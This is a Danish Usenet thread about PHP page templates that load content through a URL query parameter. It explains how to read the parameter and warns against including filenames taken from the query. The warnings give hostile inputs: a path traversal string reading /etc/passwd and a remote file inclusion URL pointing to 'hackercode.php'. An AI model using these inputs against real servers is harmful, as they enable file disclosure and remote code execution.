---

Man ser mange steder at skabalonen laves i php (se subj.) og så kalder
indholdet ind vha. et ?. F.eks. stopcopydan.dk bruger den metode.

Hvordan gør man det ?

På forhånd tak

MVH ANR

"They say the greatest tragedy is when a father outlives his son.
I've never fully understood why that is. Frankly, I can see an up
side to it."
-Abraham "Grampa" Simpson

---

"Andreas N Rasmussen" <anrNOTPART@OFMAILmac.com> wrote in message
news:1eye5uc.148w6x18dis00N%anrNOTPART@OFMAILmac.com...
> Man ser mange steder at skabalonen laves i php (se subj.) og så kalder
> indholdet ind vha. et ?. F.eks. stopcopydan.dk bruger den metode.
> Hvordan gør man det ?

stopcopydan gør fx. sådan her:
http://www.stopcopydan.dk/index.php?valg=forside

index.php spytter først en header ud.
Så viser den forsiden (fordi valg=forside), og til sidst sender den
footeren.

Andet er der såmen ikke i det.

Det kan så være at den kigger efter fx. "forside.inc.php" og includer den
hvis den findes, eller måske henter den noget fra en database, fx "SELECT
page FROM pages WHERE id='forside'".

--
Mvh.

Niels Andersen

---

Niels Andersen <niels-usenet@myplace.dk> wrote:

> stopcopydan gør fx. sådan her:
> http://www.stopcopydan.dk/index.php?valg=forside
>
> index.php spytter først en header ud.
> Så viser den forsiden (fordi valg=forside), og til sidst sender den
> footeren.
>
> Andet er der såmen ikke i det.

Okay. Jeg forstår godt hvad den gør når den har fundet ud af hvad valget
er, men hvor i php 'får man fat' valget. Hvordan ser man hvad valget er?

MVH ANR

"Ohh! A trillion-dollar bill! That's a spicy meatball!"
-Homer Simpson

---

Hejsa

"Andreas N Rasmussen" <anrNOTPART@OFMAILmac.com> wrote in message
news:1eyegb0.87uz6apoehbkN%anrNOTPART@OFMAILmac.com...
> > http://www.stopcopydan.dk/index.php?valg=forside
> Okay. Jeg forstår godt hvad den gør når den har fundet ud af hvad valget
> er, men hvor i php 'får man fat' valget. Hvordan ser man hvad valget er?

Hvis jeg forstår dit spørgsmål, så vil der blive sat en variabel i index.php
med navnet $valg med værdien "forside", i følge ovenstående link.

Mvh Hauge

---

"Andreas N Rasmussen" <anrNOTPART@OFMAILmac.com> wrote in message
news:1eyegb0.87uz6apoehbkN%anrNOTPART@OFMAILmac.com...
> > http://www.stopcopydan.dk/index.php?valg=forside

> Okay. Jeg forstår godt hvad den gør når den har fundet ud af hvad valget
> er, men hvor i php 'får man fat' valget. Hvordan ser man hvad valget er?

Med standard konfiguration vil variablen $valg på ovenstående url have
indholdet 'forside'.
Ellers vil den altid stå i $HTTP_GET_VARS['valg'].

Hvis der nu bare stod "index.php?forside" kan man benytte $QUERY_STRING
eller $HTTP_SERVER_VARS['QUERY_STRING'].

--
Mvh.

Niels Andersen

---

Niels Andersen <niels-usenet@myplace.dk> wrote:

> > Okay. Jeg forstår godt hvad den gør når den har fundet ud af hvad valget
> > er, men hvor i php 'får man fat' valget. Hvordan ser man hvad valget er?
>
> Med standard konfiguration vil variablen $valg på ovenstående url have
> indholdet 'forside'.
> Ellers vil den altid stå i $HTTP_GET_VARS['valg'].
>
> Hvis der nu bare stod "index.php?forside" kan man benytte $QUERY_STRING
> eller $HTTP_SERVER_VARS['QUERY_STRING'].

Perfekt - det var lige det jeg ville vide. Tak.

MVH ANR

"Romance is dead. It was acquired in a hostile takeover by Hallmark and
Disney, homogenized, then sold off piece by piece."
-Lisa Simpson

---

> Man ser mange steder at skabalonen laves i php (se subj.) og så kalder
> indholdet ind vha. et ?. F.eks. stopcopydan.dk bruger den metode.

Husk lige på (kan se at du allerede har fået svar på dit spørgsmål), at du
nok skal tænke over ikke bare ukritisk at include filnavnet som står i query
Det kan give sjove resultater, hvis man f.eks. i query skriver
"side.php?../../etc/passwd" eller ligende. Hehee... har set eksempler på
dette og har endda også selv gjort det en gang (uuups) - altså haft den
fejl.

--
Mvh.
Dennis

---

Dennis skrev i meddelelsen <784g7.34$Zm6.2846@news.get2net.dk>...
> Det kan give sjove resultater, hvis man f.eks. i query skriver
>"side.php?../../etc/passwd" eller ligende. Hehee... har set eksempler på
>dette og har endda også selv gjort det en gang (uuups) - altså haft den
>fejl.

Jeg har set den der med ../../etc/passwd flere gange nu og jeg er lidt
nysgerrig. Hvad kan man med de info der eventuelt hentes frem?

Andreas (der indtil nu har undgået at lave den fejl)
----
http://solitude.dk

---

> > Det kan give sjove resultater, hvis man f.eks. i query skriver
> >"side.php?../../etc/passwd" eller ligende. Hehee... har set eksempler på
> >dette og har endda også selv gjort det en gang (uuups) - altså haft den
> >fejl.

> Jeg har set den der med ../../etc/passwd flere gange nu og jeg er lidt
> nysgerrig. Hvad kan man med de info der eventuelt hentes frem?
> Andreas (der indtil nu har undgået at lave den fejl)

Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
"side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk lave
en del

--
Mvh.
Dennis

---

Dennis skrev i meddelelsen ...
>Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
>adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
>kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
>"side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk lave
>en del

Jeg prøvede sådan lige for sjov at include /etc/passwd på mit webhotel, men
det blev jeg ikke meget klogere af. Den spytter godt nok en liste over
brugere ud, så der gik da lidt tid med at være nysgerrig.

Jeg kan godt se hvor problemet ligger, men vil de fleste filer ikke være
beskyttet fordi de ikke er chmod'et til 755 (eller noget lign.) ?

Andreas
----
http://solitude.dk

---

> >Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
> >adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
> >kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
> >"side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk
lave
> >en del

> Jeg prøvede sådan lige for sjov at include /etc/passwd på mit webhotel,
men
> det blev jeg ikke meget klogere af. Den spytter godt nok en liste over
> brugere ud, så der gik da lidt tid med at være nysgerrig.
> Jeg kan godt se hvor problemet ligger, men vil de fleste filer ikke være
> beskyttet fordi de ikke er chmod'et til 755 (eller noget lign.) ?

Jo, det kræver at filen kan læses af alle eller "nobody" (eller rettere..
den bruger som Apache/WEB-server køre som).

--
Mvh.
Dennis

---

Hvordan og hvor slår man safe_mode fra??
Har nemlig lavet fejlen

/Thomas

"Dennis" <net90@mail.mira.dk> wrote in message
news:no6g7.80$Zm6.3902@news.get2net.dk...
> > > Det kan give sjove resultater, hvis man f.eks. i query skriver
> > >"side.php?../../etc/passwd" eller ligende. Hehee... har set eksempler
på
> > >dette og har endda også selv gjort det en gang (uuups) - altså haft den
> > >fejl.
>
> > Jeg har set den der med ../../etc/passwd flere gange nu og jeg er lidt
> > nysgerrig. Hvad kan man med de info der eventuelt hentes frem?
> > Andreas (der indtil nu har undgået at lave den fejl)
>
> Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
> adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
> kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
> "side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk lave
> en del
>
> --
> Mvh.
> Dennis
>
>

---

> Hvordan og hvor slår man safe_mode fra??
> Har nemlig lavet fejlen

> > Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
> > adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
> > kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
> > "side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk
lave
> > en del


I filen php.ini. Søg på safe_mode.

--
Mvh.
Dennis